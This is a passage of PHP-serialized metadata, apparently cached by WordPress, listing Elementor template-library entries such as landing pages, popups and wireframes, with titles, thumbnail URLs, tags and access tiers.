5\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-5.jpg\";s:12:\"tmpl_created\";i:1653989135;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:88:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Google Maps\",\"Header\",\"Professional\",\"Subscribe\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:202;a:19:{s:4:\"tmpl\";i:1217;s:2:\"id\";i:20333;s:5:\"title\";s:40:\"Plant Pots Online Shop &#8211; eCommerce\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2021/10/Plant-Pots-Online-Shop-250x280-2.jpg\";s:12:\"tmpl_created\";i:1634042184;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/plant-pots-online-shop-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:50:\"[\"Ecommerce\",\"Landing Pages\",\"Online Shop\",\"Shop\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:203;a:19:{s:4:\"tmpl\";i:1211;s:2:\"id\";i:20447;s:5:\"title\";s:33:\"Shared Workspace &#8211; Business\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/10/250x280-Shared-Workspace.jpg\";s:12:\"tmpl_created\";i:1633884934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/shared-workspace-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:28:\"[\"Business\",\"Landing Pages\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:204;a:19:{s:4:\"tmpl\";i:1237;s:2:\"id\";i:21313;s:5:\"title\";s:34:\"Spa &#038; Beauty &#8211; Services\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/12/Spa-Beauty-Treatments-page-1.jpg\";s:12:\"tmpl_created\";i:1638819709;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/spa-beauty-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:55:\"[\"Beauty\",\"Hair\",\"Health\",\"Services\",\"Spa\",\"Treatment\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:205;a:19:{s:4:\"tmpl\";i:1004;s:2:\"id\";i:13538;s:5:\"title\";s:32:\"Fly-In | Newsletter | Barbershop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/05/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1589893364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-newsletter-barbershop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:710;s:11:\"trend_index\";i:667;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:206;a:19:{s:4:\"tmpl\";i:924;s:2:\"id\";i:12550;s:5:\"title\";s:32:\"Fly-in | Sale | Travel and Tours\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2019/12/PopUp_s.png\";s:12:\"tmpl_created\";i:1575960263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/flyin-sale-travel-and-tours/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:754;s:11:\"trend_index\";i:791;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:207;a:19:{s:4:\"tmpl\";i:1212;s:2:\"id\";i:20479;s:5:\"title\";s:49:\"Teeth Straightening &#8211; Health &#038; Fitness\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/10/250x280-Teeth-Whitening.jpg\";s:12:\"tmpl_created\";i:1633886115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/teeth-straightening-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:46:\"[\"Business\",\"Dental\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:208;a:19:{s:4:\"tmpl\";i:1234;s:2:\"id\";i:21234;s:5:\"title\";s:34:\"Insurance Company &#8211; Services\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/12/15-Services-Insurance-Company.jpg\";s:12:\"tmpl_created\";i:1638818688;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/insurance-company-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"Faq\",\"Form\",\"Insurance\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:209;a:19:{s:4:\"tmpl\";i:1035;s:2:\"id\";i:15062;s:5:\"title\";s:35:\"Fly-In | Sign up | Flooring Company\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/08/PopUp.png\";s:12:\"tmpl_created\";i:1597739629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/fly-in-sign-up-flooring-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:625;s:11:\"trend_index\";i:309;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:210;a:19:{s:4:\"tmpl\";i:1209;s:2:\"id\";i:20394;s:5:\"title\";s:30:\"Time Management &#8211; Events\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/10/Time-Management-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884077;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/time-management-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:17:\"[\"Landing Pages\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:211;a:19:{s:4:\"tmpl\";i:1229;s:2:\"id\";i:21118;s:5:\"title\";s:28:\"Contact &#8211; Plants Store\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/12-Contact-Plants-Store.jpg\";s:12:\"tmpl_created\";i:1638802472;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/contact-plants-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:40:\"[\"Contact\",\"Info\",\"Plant\",\"Testimonial\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:212;a:19:{s:4:\"tmpl\";i:893;s:2:\"id\";i:11822;s:5:\"title\";s:30:\"Full Screen | Menu | Portfolio\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/09/PopUp_small.png\";s:12:\"tmpl_created\";i:1569429896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/full-screen-menu-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:654;s:11:\"trend_index\";i:626;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:213;a:19:{s:4:\"tmpl\";i:1203;s:2:\"id\";i:18591;s:5:\"title\";s:28:\"Coffee Sale &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280-7.png\";s:12:\"tmpl_created\";i:1633877319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/coffee-sale-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:33:\"[\"Coffee\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:214;a:19:{s:4:\"tmpl\";i:1231;s:2:\"id\";i:21184;s:5:\"title\";s:28:\"Dental Care &#8211; Services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/14-Services-Dental-Care.jpg\";s:12:\"tmpl_created\";i:1638807148;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dental-care-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Dental\",\"Medical\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:215;a:19:{s:4:\"tmpl\";i:1064;s:2:\"id\";i:15580;s:5:\"title\";s:31:\"Fullscreen | Menu | Travel Blog\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1606215358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fullscreen-menu-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:673;s:11:\"trend_index\";i:348;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:216;a:19:{s:4:\"tmpl\";i:1133;s:2:\"id\";i:16645;s:5:\"title\";s:28:\"Headphones &#8211; eCommerce\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/lp_headphones.png\";s:12:\"tmpl_created\";i:1609944115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/commerce-headphones/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:39:\"[\"Ecommerce\",\"Landing Pages\",\"Product\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:633;s:11:\"trend_index\";i:87;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:217;a:19:{s:4:\"tmpl\";i:1442;s:2:\"id\";i:24584;s:5:\"title\";s:27:\"Wireframe &#8211; Pricing 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Pricing-1.jpg\";s:12:\"tmpl_created\";i:1653989152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-pricing-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:146:\"[\"Booking\",\"Business\",\"Clients\",\"Contact\",\"Faq\",\"Features\",\"Footer\",\"Online Service\",\"Pricing\",\"Products\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:218;a:19:{s:4:\"tmpl\";i:1138;s:2:\"id\";i:16762;s:5:\"title\";s:25:\"Conference &#8211; Events\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Conference.png\";s:12:\"tmpl_created\";i:1610455119;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/conference-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:60:\"[\"Conference\",\"Convention\",\"Event\",\"Events\",\"Landing Pages\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:705;s:11:\"trend_index\";i:216;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:219;a:19:{s:4:\"tmpl\";i:1438;s:2:\"id\";i:24539;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-2.jpg\";s:12:\"tmpl_created\";i:1653989019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"Business\",\"Contact\",\"Footer\",\"Google Maps\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:220;a:19:{s:4:\"tmpl\";i:981;s:2:\"id\";i:13281;s:5:\"title\";s:37:\"Hello Bar | Contact | Interior Design\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp.png\";s:12:\"tmpl_created\";i:1586148801;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/hello-bar-contact-interior-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:19:\"[\"Interior Design\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:763;s:11:\"trend_index\";i:679;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:221;a:19:{s:4:\"tmpl\";i:1052;s:2:\"id\";i:15259;s:5:\"title\";s:31:\"Hello Bar | Menu | Psychologist\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Menu-PopUp.png\";s:12:\"tmpl_created\";i:1600170209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/hello-bar-menu-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:739;s:11:\"trend_index\";i:583;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:222;a:19:{s:4:\"tmpl\";i:1434;s:2:\"id\";i:24494;s:5:\"title\";s:28:\"Wireframe &#8211; Services 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1.jpg\";s:12:\"tmpl_created\";i:1653988874;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Business\",\"Faq\",\"Footer\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:223;a:19:{s:4:\"tmpl\";i:1194;s:2:\"id\";i:18701;s:5:\"title\";s:32:\"Digital Course &#8211; eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280.jpg\";s:12:\"tmpl_created\";i:1618995134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/digital-course-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:57:\"[\"Course Online\",\"Ecommerce\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:224;a:19:{s:4:\"tmpl\";i:1192;s:2:\"id\";i:18612;s:5:\"title\";s:34:\"Bag Product Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bag-Product.jpeg\";s:12:\"tmpl_created\";i:1618395406;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bag-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:61:\"[\"Bag\",\"Ecommerce\",\"Landing Pages\",\"Product\",\"Sale\",\"Travel\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:875;s:11:\"trend_index\";i:605;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:225;a:19:{s:4:\"tmpl\";i:1227;s:2:\"id\";i:21083;s:5:\"title\";s:26:\"Conference &#8211; Contact\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/10-Contact-Conference.jpg\";s:12:\"tmpl_created\";i:1638799208;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/conference-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:44:\"[\"Conference\",\"Contact\",\"Form\",\"Info\",\"Map\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:226;a:19:{s:4:\"tmpl\";i:1193;s:2:\"id\";i:18644;s:5:\"title\";s:37:\"Camera Product Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/camera_sale_featured-img.jpg\";s:12:\"tmpl_created\";i:1618396388;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/camera-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:59:\"[\"Camera\",\"Ecommerce\",\"Landing Pages\",\"Photography\",\"Sale\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:873;s:11:\"trend_index\";i:535;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:227;a:19:{s:4:\"tmpl\";i:951;s:2:\"id\";i:12736;s:5:\"title\";s:41:\"Slide In | Contact Us | Magazine and Blog\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_contact_s.png\";s:12:\"tmpl_created\";i:1579060978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/slide-in-contact-us/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:734;s:11:\"trend_index\";i:686;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:228;a:19:{s:4:\"tmpl\";i:1222;s:2:\"id\";i:20960;s:5:\"title\";s:26:\"Travel Agency &#8211; Home\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/5-Home-Travel-Agency.jpg\";s:12:\"tmpl_created\";i:1638788432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/travel-agency-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Adventures\",\"Experience\",\"Explore\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:229;a:19:{s:4:\"tmpl\";i:1196;s:2:\"id\";i:18815;s:5:\"title\";s:25:\"Car Wash &#8211; Business\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Car-Wash.png\";s:12:\"tmpl_created\";i:1621336431;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/car-wash-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:45:\"[\"Business\",\"car\",\"Discount\",\"Landing Pages\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:230;a:19:{s:4:\"tmpl\";i:1242;s:2:\"id\";i:21473;s:5:\"title\";s:40:\"Architecture Photography &#8211; 